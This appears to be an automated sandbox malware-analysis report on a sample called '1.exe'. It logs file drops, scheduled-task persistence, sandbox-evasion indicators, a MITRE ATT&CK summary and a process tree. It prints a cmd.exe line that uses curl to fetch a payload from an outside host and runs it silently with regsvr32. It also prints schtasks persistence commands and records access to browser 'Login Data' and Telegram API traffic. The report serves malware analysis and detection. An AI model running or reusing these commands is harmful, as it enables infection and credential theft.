    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5A00.tmp
    Source: C:\Windows\System32\curl.exe File created: C:\Users\user\AppData\Local\Temp\219880.ocx
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIC9E.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIC2F.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIEA6.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIEE5.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIBE0.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\shiA18.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSICCE.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSID4D.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIAC4.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Main\MainSoftware.exe
    Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.part
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B86.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5971.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIF15.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txt
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\How to uninstall.txt

    Boot Survival

    Source: C:\Program Files (x86)\Main\MainSoftware.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Users\user\Desktop\1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
    Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Memory allocated: 2349ED30000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Memory allocated: 27D34670000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe Memory allocated: 24A510D0000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\Chop\Install.exe Memory allocated: 2C1E2E20000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exe Memory allocated: 2488F1C0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exe Memory allocated: 19148520000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Window / User API: threadDelayed 8539
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Window / User API: threadDelayed 698
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\lzmaextractor.dll
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi56C1.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5903.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7AA9.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI59B1.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7B27.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI8914.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB81.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\ShortcutFlags.dll
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICFE.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC5F.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5A00.tmp
    Source: C:\Windows\System32\curl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\219880.ocx
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC9E.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEA6.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEE5.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE0.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCE.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiA18.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4D.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC4.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7B86.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5971.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF15.tmp
    Source: C:\Users\user\Desktop\1.exe Check user administrative privileges: GetTokenInformation
    Source: C:\Users\user\Desktop\1.exe API coverage: 8.3 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe API coverage: 0.0 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 940 Thread sleep count: 282 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 1244 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476 Thread sleep count: 184 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476 Thread sleep count: 176 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5608 Thread sleep count: 202 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 8004 Thread sleep count: 34 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476 Thread sleep count: 8539 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6892 Thread sleep count: 698 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4076 Thread sleep count: 282 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4076 Thread sleep count: 56 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 5276 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 2636 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 4780 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformation
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009B5800 FindFirstFileW,GetLastError,FindClose,11_2_009B5800
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00873CB0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,11_2_00873CB0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008931C0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,11_2_008931C0
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: 1.exe, 0000000B.00000003.1513962174.000000000509E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\*.*Failed to delete directory: LastError= Failed to delete file: shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
    Source: MainSoftware.exe, 00000010.00000002.2142070466.0000027536333000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A89823 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00A89823
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009C0430 LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,11_2_009C0430
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A8420E mov esi, dword ptr fs:[00000030h]11_2_00A8420E
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00877060 GetProcessHeap,HeapFree,11_2_00877060
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008A0100 __set_se_translator,SetUnhandledExceptionFilter,11_2_008A0100
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00893170 __set_se_translator,SetUnhandledExceptionFilter,11_2_00893170
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A89823 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00A89823
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A84D5E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00A84D5E
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 172.67.184.211 443
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="7448" chaineruiprocessid="7448chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741399570 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="7448" chaineruiprocessid="7448chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741399570 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"
    Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_009B6700 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle
    Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A7C130 cpuid
    Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A9F27F GetLocaleInfoW
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformation
    Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\TBioYkjtYu\output.zip VolumeInformation
    Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\TBioYkjtYu\output.zip VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A8597E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
    Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00857950 GetVersion
    Source: C:\Users\user\Desktop\1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\1.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

    Stealing of Sensitive Information

    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the signature count shown next to that technique in the matrix)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
    Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
    Execution: Native API (2); Command and Scripting Interpreter (12); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
    Persistence: DLL Side-Loading (1); DLL Search Order Hijacking (1); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
    Privilege Escalation: DLL Side-Loading (1); DLL Search Order Hijacking (1); Process Injection (111); Scheduled Task/Job (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Timestomp (1); DLL Side-Loading (1); DLL Search Order Hijacking (1); File Deletion (1); Masquerading (32); Modify Registry (1); Virtualization/Sandbox Evasion (31); Process Injection (111)
    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
    Discovery: System Time Discovery (1); Peripheral Device Discovery (11); File and Directory Discovery (4); System Information Discovery (36); Security Software Discovery (121); Virtualization/Sandbox Evasion (31); Process Discovery (2); Application Window Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
    Collection: Archive Collected Data (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
    Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (4); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
    Behavior Graph ID: 1632500; Sample: 1.exe; Start date: 08/03/2025; Architecture: WINDOWS; Score: 48

    Contacted domains/IPs (top level): api.telegram.org; wetransfers.io; 2 other IPs or domains
    Signatures (top level): Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures; Uses the Telegram API (likely for C&C communication) (api.telegram.org)

    Process tree (started processes, with dropped files and network contacts as shown in the graph):
    1.exe
        dropped: C:\Users\user\AppData\...\MainSoftware.exe (PE32+); C:\Users\user\...\SoftwareDistributor.exe (PE32+); C:\Users\user\AppData\Local\Temp\shiA18.tmp (PE32+); 14 other malicious files
        1.exe
            dropped: C:\Users\user\AppData\Local\...\shi56C1.tmp (PE32+)
    msiexec.exe
        dropped: C:\Windows\Installer\MSI8914.tmp (PE32); C:\Windows\Installer\MSI7B86.tmp (PE32); C:\Windows\Installer\MSI7B27.tmp (PE32); 7 other malicious files
        MainSoftware.exe
            network: jonatechlab.com 172.67.135.71 CLOUDFLARENETUS United States
            schtasks.exe
                conhost.exe
            schtasks.exe
                conhost.exe
        msiexec.exe
            network: swiftvantage.online 104.21.80.136, 443, 49701, 49703 CLOUDFLARENETUS United States
            dropped: C:\Program Files (x86)\...\Install.exe.part (PE32+); C:\Program Files (x86)\...\Install.exe (copy) (PE32+)
        SoftwareDistributor.exe
            schtasks.exe
                conhost.exe
        2 other processes
    MainSoftware.exe
        dropped: C:\Program Files (x86)\Main\...\Install.exe (PE32+)
        Install.exe
            cmd.exe
                regsvr32.exe
                    network: api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom
                    signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal browser information (history, passwords, etc)
                curl.exe
                    network: wetransfers.io 172.67.184.211 CLOUDFLARENETUS United States; 127.0.0.1 unknown unknown
                    dropped: C:\Users\user\AppData\Local\Temp\219880.ocx (PE32+)
                conhost.exe
            conhost.exe
    2 other processes
